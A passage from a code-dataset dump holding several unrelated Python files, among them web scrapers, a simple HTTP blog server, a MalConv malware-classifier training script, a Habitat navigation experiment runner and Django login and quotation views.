np\nimport copy\nimport MySQLdb\nimport re,sys\n\nimport os, sys # 全フォルダ参照\npath = os.path.join(os.path.dirname(__file__), '../../')\nsys.path.append(path)\nfrom mysql_connect import 
jalan_ktylab_new\nconn,cur = jalan_ktylab_new.main()\n\ndef spot_list(select_spot):\n spot_list = []\n cur.execute(select_spot)\n for i in cur:\n spot_list.append(i)\n return spot_list\n\ndef cossim(x, y):\n return np.dot(x, y) / (np.linalg.norm(x) * np.linalg.norm(y))\n\ndef recommend_all(visited_name,unvisited_name,visited_review,unvisited_review):\n value_UtoV = []\n for i in range(len(unvisited_name)):\n temp_UtoV = []\n for j in range(len(visited_name)):\n unvisited_to_visited = cossim(unvisited_review[i],visited_review[j])\n temp_UtoV.append([visited_name[j],unvisited_to_visited])\n value_UtoV.append(temp_UtoV)\n list_UtoV = list(zip(unvisited_name,value_UtoV))\n list_UtoV_top = []\n for i in range(len(list_UtoV)):\n list_UtoV[i][1].sort(key=lambda x:x[1],reverse=True)\n for j in range(len(list_UtoV[i][1])):\n # if list_UtoV[i][1][j][1] > 0.1: #0.125 / 0.1 /0.05\n list_UtoV_top.append([list_UtoV[i][0],list_UtoV[i][1][j]])\n # else:\n # continue\n return list_UtoV_top\n","sub_path":"cgi-bin/analogy_master_doc2vec/mypackage/doc2vec_recommend.py","file_name":"doc2vec_recommend.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"279560941","text":"from Scrapper import scrapper as sc\nfrom datetime import datetime\nclass ScrapperSiteMQuemDisse:\n def __init__(self):\n pass\n\n @staticmethod\n def Get_Produto(url):\n soup = sc.Get_Soup(url)\n mydivs = soup.find_all(\"div\",class_ = \"product\")\n lista = []\n for div in mydivs:\n TagProductName = div.find_all(\"div\", class_=\"product-content\")\n texto = TagProductName[0].text.split('\\n')\n TagImage = div.find_all(\"img\")\n productImage = TagImage[0].get('src')\n\n contador = 0\n for r in texto:\n if r != '':\n contador = contador + 1\n if contador == 1:\n productname = r\n if contador == 2:\n valor = r.replace(\"R$\", \"\").replace(\",\", \".\")\n productPrice = float(valor)\n\n ProductDataAcesso = 
datetime.today().strftime('%Y-%m-%d')\n lista.append({\"Marca\":\"Quem Disse\",\"Nome\":productname,\"Preco\":productPrice,\"imagem\":productImage,\"DataAcesso\":ProductDataAcesso})\n\n return lista\n","sub_path":"venv/customized/ScrapperSiteQuemDisse.py","file_name":"ScrapperSiteQuemDisse.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"337970642","text":"filename = \"10.5.txt\"\n\nwhile True:\n reason = input(\"Why do you like programming?(q = quit): \")\n\n if reason == \"q\":\n break\n\n with open(filename, 'a') as file_object:\n file_object.write(reason + '\\n')\n\n","sub_path":"10.5.py","file_name":"10.5.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"516111549","text":"from bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nimport requests\nimport pandas as pd\n\n\ndef format_html(word):\n for x in range(len(word)):\n if word[0:1] == '\\n':\n return format_html(word[1:])\n elif word[0:1] == \" \":\n return format_html(word[1:])\n else:\n return word\n\ndef format_links(site_link, link):\n return (site_link + link)\n\n\n#File for all scraped data functions\n\ndef get_indeed():\n indeed = requests.get(\"https://www.indeed.ca/jobs?q=software+co-op&l=Toronto\")\n print(indeed)\n\n soup = BeautifulSoup(indeed.content, 'html.parser')\n\n jobs_column = soup.find(id='resultsCol')\n\n job_names_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .title a.jobtitle\")\n job_names = [name.get_text() for name in job_names_container]\n\n job_companies_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .sjcl span.company\")\n job_companies = [company.get_text() for company in job_companies_container]\n\n job_location_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .sjcl .location\")\n job_location = 
[location.get_text() for location in job_location_container]\n\n job_description_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .summary\")\n job_description = [description.get_text() for description in job_description_container]\n\n job_links_container = jobs_column.select(\"#resultsCol .jobsearch-SerpJobCard .title a[href]\")\n job_links = [links.get(\"href\") for links in job_links_container]\n\n for x in range(len(job_names)):\n job_names[x] = format_html(job_names[x])\n job_companies[x] = format_html(job_companies[x])\n job_location[x] = format_html(job_location[x])\n job_description[x] = format_html(job_description[x])\n job_links[x] = format_links(\"https://www.indeed.ca\", job_links[x])\n\n\n job = pd.DataFrame({\n \"job_names\": job_names,\n \"job_companies\": job_companies,\n \"job_locations\": job_location,\n \"job_description\": job_description,\n \"job_links\": job_links\n })\n pd.set_option('display.max_colwidth', -1)\n\n return job\n\n\ndef get_glassdoor():\n\n url = \"https://www.glassdoor.ca/Job/software-intern-jobs-SRCH_KO0,15.htm\"\n\n req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n glassdoor = urlopen(req).read()\n\n if(glassdoor):\n print(\"Glassdoor: 200\")\n\n\n page_soup = BeautifulSoup(glassdoor, 'html.parser')\n\n jobs_column = page_soup.find(id='JobResults')\n\n job_names_container = jobs_column.select(\".jl .jobContainer > a.jobLink.jobInfoItem.jobTitle \")\n job_names = [name.get_text() for name in job_names_container]\n\n job_companies_container = jobs_column.select(\".jl .jobContainer .jobHeader a div.jobInfoItem\")\n job_companies = [company.get_text() for company in job_companies_container]\n\n job_location_container = jobs_column.select(\".jl .jobContainer .jobInfoItem span.subtle\")\n job_location = [location.get_text() for location in job_location_container]\n\n job_description = []\n for i in range(len(job_location_container)):\n job_description.append(\"Not Available\")\n\n job_links_container = 
jobs_column.select(\".jl .jobContainer .jobHeader a[href]\")\n job_links = [links.get(\"href\") for links in job_links_container]\n\n print(len(job_names))\n print(len(job_links))\n\n for x in range(len(job_names)):\n job_names[x] = format_html(job_names[x])\n job_companies[x] = format_html(job_companies[x])\n job_location[x] = format_html(job_location[x])\n job_description[x] = format_html(job_description[x])\n job_links[x] = format_links(\"https://www.glassdoor.ca\", job_links[x])\n\n\n job = pd.DataFrame({\n \"job_names\": job_names,\n \"job_companies\": job_companies,\n \"job_locations\": job_location,\n \"job_description\": job_description,\n \"job_links\": job_links\n })\n pd.set_option('display.max_colwidth', -1)\n\n return job","sub_path":"venv/data_scrapes.py","file_name":"data_scrapes.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"39041386","text":"import numpy as np\nimport math\nimport argparse\n\nparser = argparse.ArgumentParser(description='NormSampleCompact')\nparser.add_argument('--d', type=int, default='4', metavar='N',\n help='number of electrons (default: 4)')\nparser.add_argument('--Nsample', type=int, default=1000, metavar='N',\n help='input number of nodes per layer (default: 1000)')\nargs = parser.parse_args()\n\n\n\nd = args.d\nNsample = args.Nsample\n\nnp.random.seed(1234) #for reproducibility\nx_traj = np.random.uniform(-1,1,(Nsample,d))\ny_traj = np.sum(np.power(x_traj,2),axis=1)\n\ndata_folder = 'data/'\nfilenameIpt = data_folder + 'square_'+ 'x_' + str(d) + '_Nsample_' + str(Nsample) +'.dat'\nfilenameOpt = data_folder + 'square_'+ 'y_' + str(d) + '_Nsample_' + str(Nsample) +'.dat'\n\nnp.savetxt(filenameIpt, x_traj)\nnp.savetxt(filenameOpt, 
y_traj)\n","sub_path":"sample_square.py","file_name":"sample_square.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"423779489","text":"import http.server\nimport socketserver\nimport sqlite3\nfrom controller import *\nfrom model import *\nimport sys\nimport os\nfrom sys import version as python_version\nfrom cgi import parse_header, parse_multipart\n\nif python_version.startswith('3'):\n from urllib.parse import parse_qs\n#import view\n\nPORT = 8000\nclass myHandler(http.server.BaseHTTPRequestHandler):\n\t\n\tdef parse_POST(self):\n\t\tctype, pdict = parse_header(self.headers['content-type'])\n\t\tif ctype == 'multipart/form-data':\n\t\t\tpostvars = parse_multipart(self.rfile, pdict)\n\t\telif ctype=='application/x-www-form-urlencoded':\n\t\t\tlength = int(self.headers['content-length'])\n\t\t\tpostvars = parse_qs(\n\t\t\t\t\tself.rfile.read(length).decode('UTF-8'), \n\t\t\t\t\tkeep_blank_values=1)\n\t\telse:\n\t\t\tpostvars = {}\n\t\treturn postvars\n\tdef loadTemplate(self,which):\n\t\t\tf = open(which,'r')\n\t\t\tcontent = \"\"\n\t\t\tfor line in f.readlines():\n\t\t\t\tcontent += line\n\t\t\tf.close()\n\t\t\tcontent = content[content.find('<'):]\n\t\t\treturn str(content)\n\tdef do_POST(self):\n\t\t\n\t\tpostvars = self.parse_POST()\n\t\tc = Controller()\n\t\tc.addPost(postvars['name'][0],postvars['text'][0])\n\t\tcontent = self.loadTemplate(\"index.html\")\n\t\ttoreplace = self.loadTemplate(\"add_post.html\")\n\t\tcontent = content.replace(\"$$$CONTENT$$$\",toreplace)\n\t\tself.send_response(200)\n\t\tself.send_header('Content-type','text/html')\n\t\tself.end_headers()\n\t\tself.wfile.write(bytes(content,\"UTF-8\"))\n\tdef do_GET(self):\n\t\tprint(self.path)\n\t\tcontent = \"\"\n\t\tc = Controller()\n\t\tif self.path==\"/\" or self.path==\"/index.html\":\n\t\t\tcontent = self.loadTemplate(\"index.html\")\n\t\t\tlist1 = c.GetAllPosts()\n\t\t\tto_insert = 
self.loadTemplate(\"table_template.html\")\n\t\t\tallposts = \"\"\n\t\t\tfor i in range(len(list1)):\n\t\t\t\ttable_content = self.loadTemplate(\"posts_template.html\")\n\t\t\t\ttable_content = table_content.replace(\"$NAME$\",list1[i].name)\n\t\t\t\ttable_content = table_content.replace(\"$TEXT$\",list1[i].text)\n\t\t\t\tallposts += table_content\n\t\t\tto_insert = to_insert.replace(\"CONTENT\",allposts)\n\t\t\tcontent = content.replace(\"$$$CONTENT$$$\",to_insert)\n\t\tif self.path==\"/about.html\":\n\t\t\tcontent = self.loadTemplate(\"index.html\")\n\t\t\tabout_text = c.about()\n\t\t\tcontent = content.replace(\"$$$CONTENT$$$\",about_text)\t\n\t\tif self.path==\"/add.html\":\n\t\t\tcontent = self.loadTemplate(\"index.html\")\n\t\t\ttoreplace = self.loadTemplate(\"add_post.html\")\n\t\t\tcontent = content.replace(\"$$$CONTENT$$$\",toreplace)\t\n\t\t\t\n\t#\tprint(self.query)\n\t\tself.send_response(200)\n\t\tself.send_header('Content-type','text/html')\n\t\tself.end_headers()\n\t\tself.wfile.write(bytes(content,\"UTF-8\"))\n\t\t\nhttpd = socketserver.TCPServer((\"\", PORT), myHandler)\n\nprint (\"serving at port\", PORT)\nhttpd.serve_forever()\n\n","sub_path":"12BD02013/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"373884104","text":"import unittest\nfrom solution import sherlockAndAnagrams as func\n\n# If the test_data were to continue to grow it'd make sense to move it into it's own file.\ntest_data = [\n {\n \"input\": \"abba\",\n \"solution\": 4\n },\n {\n \"input\": \"abcd\",\n \"solution\": 0\n },\n {\n \"input\": \"ifailuhkqq\",\n \"solution\": 3\n },\n {\n \"input\": \"kkkk\",\n \"solution\": 10\n },\n {\n \"input\": \"cdcd\",\n \"solution\": 5\n },\n # {\n # \"input\":\n # \"solution\":\n # },\n]\n\n\nclass TestSherlockAndAnagrams(unittest.TestCase):\n def test__func(self):\n for case in test_data:\n A = 
case[\"input\"]\n with self.subTest(f\"\\nA = {A}\\n\"):\n self.assertEqual(\n case[\"solution\"],\n func(A)\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"hacker-rank/sherlock-and-anagrams/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517024984","text":"import argparse\nimport os\nimport sys\n\nimport torch\n\nfrom src.model import MalConv\nfrom utils import Logger, ProgressBar, Chrono, dataloader, get_torch_vars, Utils, update_lr\n\n\nclass AndroConv:\n log_msg = '{}, {:.2f}, {:.10f}, {:.6f}, {:.4f}, {:.6f}, {:.4f}\\n'\n step_msg = 'Step: %s | Tot: %s | Lr: %.5f | Loss: %.3f | Acc: %.3f%% (%d/%d)'\n\n epochs = [1, 3, 5]\n classes = ('benign', 'malware')\n epoch = 0\n\n train_acc = 0\n test_acc = 0\n best_acc = 0\n\n train_loss = 0\n test_loss = 0\n\n pred = None\n confusion_matrix = None\n\n def __init__(self, args):\n self.initial_lr = args.learning_rate\n self.lr = args.learning_rate\n self.test_only = args.test_only\n self.dump_statistics = args.dump_statistics\n self.modelName = \"malconv\"\n self.experiment = args.experiment\n self.log_path = args.log_path\n self.save_path = args.save_path\n\n if not os.path.isdir(self.log_path):\n os.makedirs(self.log_path)\n\n self.logger = Logger('%s/%s_%s.csv' % (self.log_path, self.modelName, args.experiment),\n 'epoch, time, learning_rate, tr_loss, tr_acc, val_loss, val_acc')\n self.progress_bar = ProgressBar()\n self.chrono = Chrono()\n\n self.trainset, self.testset, self.trainloader, self.testloader = dataloader(args.first_n_byte)\n\n print('==> Building model..')\n self.model = MalConv(input_length=args.first_n_byte)\n\n if torch.cuda.is_available():\n self.model = torch.nn.DataParallel(self.model)\n torch.backends.cudnn.benchmark = True\n\n self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)\n\n if args.resume or self.test_only or 
self.dump_statistics:\n self.load()\n\n self.criterion = torch.nn.BCELoss()\n self.criterion = get_torch_vars(self.criterion, False)\n\n self.model = get_torch_vars(self.model, False)\n\n def run(self):\n if self.test_only:\n self.test()\n elif self.dump_statistics:\n self.test()\n self.dump_cmx()\n self.dump_measurements()\n else:\n for epoch in range(self.epoch, self.epochs[-1]):\n self.epoch = epoch\n print('\\nEpoch: %d' % (self.epoch + 1))\n\n with self.chrono.measure(\"epoch\"):\n self.train()\n self.test()\n\n self.log()\n\n if self.test_acc > self.best_acc:\n self.save()\n\n def train(self):\n self.model.train()\n self.train_loss = 0\n correct = 0\n total = 0\n self.pred = []\n self.progress_bar.newbar(len(self.trainloader))\n for batch_idx, (inputs, targets) in enumerate(self.trainloader):\n with self.chrono.measure(\"step_time\"):\n inputs = get_torch_vars(inputs)\n targets = get_torch_vars(targets)\n\n self.lr = update_lr(self.optimizer,\n self.epoch, self.epochs,\n self.initial_lr,\n batch_idx, len(self.trainloader))\n if self.lr is None:\n break\n\n self.optimizer.zero_grad()\n outputs = self.model(inputs)\n loss = self.criterion(outputs.double(), targets.double())\n loss.backward()\n self.optimizer.step()\n\n self.train_loss += loss.item()\n predicted = (outputs + 0.5).int()\n total += targets.size(0)\n correct += (predicted == targets).sum().item()\n self.pred.append(outputs.cpu().data.numpy())\n\n msg = self.step_msg % (Utils.format_time(self.chrono.last('step_time')),\n Utils.format_time(self.chrono.total('step_time')),\n self.lr,\n self.train_loss / (batch_idx + 1),\n 100. * correct / total,\n correct,\n total)\n self.progress_bar.update(batch_idx, msg)\n\n self.chrono.remove(\"step_time\")\n self.train_acc = 100. 
* correct / total\n\n def test(self):\n self.model.eval()\n self.test_loss = 0\n correct = 0\n total = 0\n self.pred = []\n self.confusion_matrix = torch.zeros([len(self.classes), len(self.classes)], dtype=torch.int)\n with torch.no_grad():\n self.progress_bar.newbar(len(self.testloader))\n for batch_idx, (inputs, targets) in enumerate(self.testloader):\n with self.chrono.measure(\"step_time\"):\n inputs = get_torch_vars(inputs)\n targets = get_torch_vars(targets)\n\n outputs = self.model(inputs)\n loss = self.criterion(outputs.double(), targets.double())\n\n self.test_loss += loss.item()\n predicted = (outputs + 0.5).int()\n total += targets.size(0)\n correct += (predicted == targets).sum().item()\n self.pred.append(outputs.cpu().data.numpy())\n\n for t, p in zip(targets.view(-1), predicted.view(-1)):\n self.confusion_matrix[t.long(), p.long()] += 1\n\n msg = self.step_msg % (Utils.format_time(self.chrono.last('step_time')),\n Utils.format_time(self.chrono.total('step_time')),\n self.lr,\n self.test_loss / (batch_idx + 1),\n 100. * correct / total,\n correct,\n total)\n self.progress_bar.update(batch_idx, msg)\n\n self.chrono.remove(\"step_time\")\n self.test_acc = 100. 
* correct / total\n\n def load(self):\n print('==> Loading from save...')\n assert os.path.isdir('./%s' % self.save_path), 'Error: save directory not found!'\n state_dict = torch.load('./%s/%s_%s.pth' % (self.save_path, self.modelName, self.experiment))\n self.model.load_state_dict(state_dict['model'])\n self.optimizer.load_state_dict(state_dict['optimizer'])\n self.epoch = state_dict['epoch'] + 1\n self.best_acc = state_dict['acc']\n print('%s epoch(s) will run, save already has %s epoch(s) and best %s accuracy'\n % ((self.epochs[-1] - self.epoch), self.epoch, self.best_acc))\n\n def save(self):\n self.best_acc = self.test_acc\n print('Saving..')\n state = {\n 'model': self.model.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'acc': self.best_acc,\n 'epoch': self.epoch\n }\n if not os.path.isdir('./%s' % self.save_path):\n os.mkdir('./%s' % self.save_path)\n torch.save(state, './%s/%s_%s.pth' % (self.save_path, self.modelName, self.experiment))\n\n self.dump_predictions()\n self.dump_cmx()\n self.dump_measurements()\n\n def dump_predictions(self):\n test_pred = [item for sublist in list(self.pred) for item in sublist]\n with open('./%s/%s_%s.pred' % (self.save_path, self.modelName, self.experiment), 'w') as f:\n for pred in test_pred:\n print('%.5f' % pred[0], file=f)\n\n def dump_cmx(self):\n with open('./%s/%s_%s.cmx' % (self.save_path, self.modelName, self.experiment), 'w') as f:\n print(self.confusion_matrix.cpu().data.numpy(), file=f)\n\n def log(self):\n self.logger.write(self.log_msg.format(self.epoch + 1,\n self.chrono.last(\"epoch\"),\n self.lr,\n self.train_loss / len(self.trainloader), self.train_acc,\n self.test_loss / len(self.testloader), self.test_acc))\n\n def dump_measurements(self):\n with open('./%s/%s_%s.mea' % (self.save_path, self.modelName, self.experiment), 'w') as f:\n tp = self.confusion_matrix.diag()\n for c in range(len(self.classes)):\n idx = torch.ones(len(self.classes)).byte()\n idx[c] = 0\n\n tn = 
self.confusion_matrix[idx.nonzero()[:, None], idx.nonzero()].sum()\n fp = self.confusion_matrix[idx, c].sum()\n fn = self.confusion_matrix[c, idx].sum()\n\n print('Class {}\\nTP {}, TN {}, FP {}, FN {}'.format(c, tp[c], tn, fp, fn), file=f)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='PyTorch MalConv Training')\n parser.add_argument('-r', '--resume', action='store_true', help='resume from save')\n parser.add_argument('-t', '--test_only', action='store_true', help='Test only')\n parser.add_argument('-s', '--dump_statistics', action='store_true', help='Test and save all statistics')\n parser.add_argument('-l', '--learning_rate', default=3e-4, type=float, help='learning rate')\n parser.add_argument('-b', '--first_n_byte', default=8000000, type=int, help='First n bytes to read from binary')\n parser.add_argument('-x', '--experiment', default=1, help='Experiment number')\n parser.add_argument('-lp', '--log_path', default='logs', help='Path that log files stored')\n parser.add_argument('-sp', '--save_path', default='state_dicts', help='Path that pytorch save files stored')\n if len(sys.argv) == 1:\n parser.print_help(sys.stderr)\n AndroConv(parser.parse_args()).run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"365207054","text":"#!/usr/bin/env python3\n\n# Copyright (c) Facebook, Inc. 
and its affiliates.\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport argparse\nimport random\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport torch\nimport numpy as np\nfrom habitat.utils.visualizations import maps\nfrom habitat_baselines.common.baseline_registry import baseline_registry\nfrom habitat_baselines.config.default import get_config\n\n\nfrom habitat.tasks.utils import (\n cartesian_to_polar,\n quaternion_rotate_vector,\n)\n\n\nfrom typing import Any\nimport habitat\nfrom gym import spaces\nimport math\n\n# @habitat.registry.register_sensor(name=\"Agent_Orientation\")\n# class AgentOrientationSensor(habitat.Sensor):\n# def __init__(self, sim, config, **kwargs: Any):\n# super().__init__(config=config)\n\n# self._sim = sim\n\n# def _get_uuid(self, *args: Any, **kwargs: Any):\n# return \"agent_orientation\"\n\n# def _get_sensor_type(self, *args: Any, **kwargs: Any):\n# return habitat.SensorTypes.HEADING\n\n# # Defines the size and range of the observations of the sensor\n# def _get_observation_space(self, *args: Any, **kwargs: Any):\n# return spaces.Box(\n# low=np.finfo(np.float32).min,\n# high=np.finfo(np.float32).max,\n# shape=(3,),\n# dtype=np.float32,\n# )\n\n# def _quat_to_xy_heading(self, quat):\n# direction_vector = np.array([0, 0, -1])\n\n# heading_vector = quaternion_rotate_vector(quat, direction_vector)\n\n# phi = cartesian_to_polar(-heading_vector[2], heading_vector[0])[1]\n# return np.array(phi)\n\n# def get_observation(\n# self, observations, *args: Any, episode, **kwargs: Any\n# ):\n# return self._quat_to_xy_heading(self._sim.get_agent_state().rotation)\n\n\n\n# def get_get_topdown_map(sim):\n# top_down_map = maps.get_topdown_map(sim, map_resolution=(500, 500))\n# recolor_map = np.array(\n# [[255, 255, 255], [128, 128, 128], [0, 0, 0]], dtype=np.uint8\n# )\n# range_x = np.where(np.any(top_down_map, axis=1))[0]\n# range_y = 
np.where(np.any(top_down_map, axis=0))[0]\n# padding = int(np.ceil(top_down_map.shape[0] / 125))\n# range_x = (\n# max(range_x[0] - padding, 0),\n# min(range_x[-1] + padding + 1, top_down_map.shape[0]),\n# )\n# range_y = (\n# max(range_y[0] - padding, 0),\n# min(range_y[-1] + padding + 1, top_down_map.shape[1]),\n# )\n# top_down_map = top_down_map[\n# range_x[0] : range_x[1], range_y[0] : range_y[1]\n# ]\n# top_down_map = recolor_map[top_down_map][:,:,0]\n# left=(1500-top_down_map.shape[1])//2\n# right=1500-top_down_map.shape[1]-left\n# top=(1500-top_down_map.shape[0])//2\n# bot=1500-top_down_map.shape[0]-top\n# top_down_map=np.pad(top_down_map,((top, bot), (left, right)), 'constant', constant_values=((255,255), (255,255)))\n# return top_down_map\n\n#############################################################\nnothin = torch.rand(100,100)\n\n@habitat.registry.register_sensor(name=\"Agent_Position\")\nclass AgentPositionSensor(habitat.Sensor):\n def __init__(self, sim, config, **kwargs: Any):\n super().__init__(config=config)\n\n self._sim = sim\n\n def _get_uuid(self, *args: Any, **kwargs: Any):\n return \"agent_position\"\n\n def _get_sensor_type(self, *args: Any, **kwargs: Any):\n return habitat.SensorTypes.POSITION\n\n # Defines the size and range of the observations of the sensor\n def _get_observation_space(self, *args: Any, **kwargs: Any):\n return spaces.Box(\n low=np.finfo(np.float32).min,\n high=np.finfo(np.float32).max,\n shape=(3,),\n dtype=np.float32,\n )\n\n def get_observation(\n self, observations, *args: Any, episode, **kwargs: Any\n ):\n return self._sim.get_agent_state().position\n\n\n\n@habitat.registry.register_sensor(name=\"Agent_Map\")\nclass AgentMapSensor(habitat.Sensor):\n def __init__(self, sim, config, **kwargs: Any):\n super().__init__(config=config)\n self._sim = sim\n\n def _get_uuid(self, *args: Any, **kwargs: Any):\n return \"agent_map\"\n\n def _get_sensor_type(self, *args: Any, **kwargs: Any):\n return habitat.SensorTypes.MAP\n\n 
# Defines the size and range of the observations of the sensor\n def _get_observation_space(self, *args: Any, **kwargs: Any):\n return spaces.Box(\n low=np.finfo(np.float32).min,\n high=np.finfo(np.float32).max,\n shape=(100,100),\n # shape=(, get_get_topdown_map(self._sim).shape[1]),\n dtype=np.float32,\n )\n\n def get_observation(\n self, observations, *args: Any, episode, **kwargs: Any\n ):\n return torch.zeros(100,100)\n\n@habitat.registry.register_measure\nclass EpisodeInfoExample(habitat.Measure):\n def __init__(self, sim, config, **kwargs: Any):\n # This measure only needs the config\n self._config = config\n super().__init__()\n\n # Defines the name of the measure in the measurements dictionary\n def _get_uuid(self, *args: Any, **kwargs: Any):\n return \"episode_info\"\n\n # This is called whenver the environment is reset\n def reset_metric(self, *args: Any, episode, **kwargs: Any):\n # Our measure always contains all the attributes of the episode\n self._metric = vars(episode).copy()\n # But only on reset, it has an additional field of my_value\n # self._metric[\"my_value\"] = self._config.VALUE\n\n # This is called whenver an action is taken in the environment\n def update_metric(self, *args: Any, episode, action, **kwargs: Any):\n # Now the measure will just have all the attributes of the episode\n self._metric = vars(episode).copy()\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--run-type\",\n choices=[\"train\", \"eval\"],\n required=True,\n help=\"run type of the experiment (train or eval)\",\n )\n parser.add_argument(\n \"--exp-config\",\n type=str,\n required=True,\n help=\"path to config yaml containing info about experiment\",\n )\n parser.add_argument(\n \"opts\",\n default=None,\n nargs=argparse.REMAINDER,\n help=\"Modify config options from command line\",\n )\n args = parser.parse_args()\n run_exp(**vars(args))\n\n\ndef run_exp(exp_config: str, run_type: str, opts=None) -> None:\n r\"\"\"Runs experiment given 
mode and config\n\n Args:\n exp_config: path to config file.\n run_type: \"train\" or \"eval.\n opts: list of strings of additional config options.\n\n Returns:\n None.\n \"\"\"\n config = get_config(exp_config, opts)\n config.defrost()\n\n # Add things to the config to for the measure\n config.TASK_CONFIG.TASK.EPISODE_INFO_EXAMPLE = habitat.Config()\n # The type field is used to look-up the measure in the registry.\n # By default, the things are registered with the class name\n config.TASK_CONFIG.TASK.EPISODE_INFO_EXAMPLE.TYPE = \"EpisodeInfoExample\"\n # config.TASK_CONFIG.TASK.EPISODE_INFO_EXAMPLE.VALUE = 5\n # Add the measure to the list of measures in use\n config.TASK_CONFIG.TASK.MEASUREMENTS.append(\"EPISODE_INFO_EXAMPLE\")\n\n\n config.TASK_CONFIG.TASK.AGENT_MAP_SENSOR = habitat.Config() ###\n config.TASK_CONFIG.TASK.AGENT_MAP_SENSOR.TYPE = \"Agent_Map\" ###\n config.TASK_CONFIG.TASK.SENSORS.append(\"AGENT_MAP_SENSOR\")\n config.TASK_CONFIG.TASK.MEASUREMENTS.append(\"TOP_DOWN_MAP\")\n\n\n\n config.TASK_CONFIG.TASK.AGENT_POSITION_SENSOR = habitat.Config() ###\n config.TASK_CONFIG.TASK.AGENT_POSITION_SENSOR.TYPE = \"Agent_Position\" ###\n config.TASK_CONFIG.TASK.SENSORS.append(\"AGENT_POSITION_SENSOR\")\n\n\n###\n \n##\n\n config.TASK_CONFIG.TASK.SENSORS.append(\"HEADING_SENSOR\")\n config.freeze()\n\n random.seed(config.TASK_CONFIG.SEED)\n np.random.seed(config.TASK_CONFIG.SEED)\n\n trainer_init = baseline_registry.get_trainer(config.TRAINER_NAME)\n assert trainer_init is not None, f\"{config.TRAINER_NAME} is not supported\"\n trainer = trainer_init(config)\n\n if run_type == \"train\":\n trainer.train()\n elif run_type == \"eval\":\n trainer.eval()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"habitat_baselines/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"354928578","text":"from django.shortcuts import render, 
redirect\nfrom django.http import HttpResponse\nfrom .forms import Sign_up_form, Free_Quotation_form, CreateUserForm, StatusForm\nfrom .models import Sign_up, Free_Quotation\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .decorators import unauthenticated_user, allowed_users\n\n\n\ndef registerPage(request):\n\tif request.user.is_authenticated:\n\t\treturn redirect('home')\n\telse:\n\t\tform = CreateUserForm()\n\t\tif request.method == 'POST':\n\t\t\tform = CreateUserForm(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tform.save()\n\t\t\t\tuser = form.cleaned_data.get('username')\n\t\t\t\tmessages.success(request, 'Account was created for ' + user)\n\n\t\t\t\treturn redirect('login')\n\t\t\t\n\n\t\tcontext = {'form':form}\n\t\treturn render(request, 'Project/register.html', context)\n\ndef loginPage(request):\n\tif request.user.is_authenticated:\n\t\treturn redirect('home')\n\telse:\n\t\tif request.method == 'POST':\n\t\t\tusername = request.POST.get('username')\n\t\t\tpassword =request.POST.get('password')\n\n\t\t\tuser = authenticate(request, username=username, password=password)\n\n\t\t\tif user is not None:\n\t\t\t\tlogin(request, user)\n\t\t\t\treturn redirect('home')\n\t\t\telse:\n\t\t\t\tmessages.info(request, 'Username or Password is Incorrect')\n\n\t\tcontext = {}\n\t\treturn render(request, 'Project/login.html', context)\n\n\ndef logoutUser(request):\n\tlogout(request)\n\treturn redirect('login')\n\n\n# @login_required(login_url='login')\ndef Home(request):\n picture = Free_Quotation.objects.all()\n return render(request, 'Project/Home.html', {'picture': picture})\n\n@login_required(login_url='login')\ndef About_us(request):\n return render(request, 'Project/AboutUs.html')\n\n\n@login_required(login_url='login')\ndef Contact_us(request):\n return render(request, 
'Project/ContactUs.html')\n\n\ndef Warning(request):\n return render(request, 'Project/warningpage.html')\n\n\n# def Signup(request):\n# form = Sign_up_form()\n# if request.method == 'POST':\n# form = Sign_up_form(request.POST)\n# if form.is_valid():\n# form.save()\n# return redirect('/login')\n# context = {'form' :form}\n# return render(request, 'Project/Signup.html', context)\n\n# @login_required(login_url='login')\n# def Table(request):\n# table = Sign_up.objects.all()\n# return render(request, 'Project/table.html', {'table': table})\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['Admin'])\ndef Table1(request):\n table = Free_Quotation.objects.all()\n done = table.filter(status='Done').count()\n pending = table.filter(status='Pending').count()\n form = StatusForm()\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return redirect('/table')\n context = {'form':form,'table': table, 'done': done, 'pending': pending}\n return render(request, 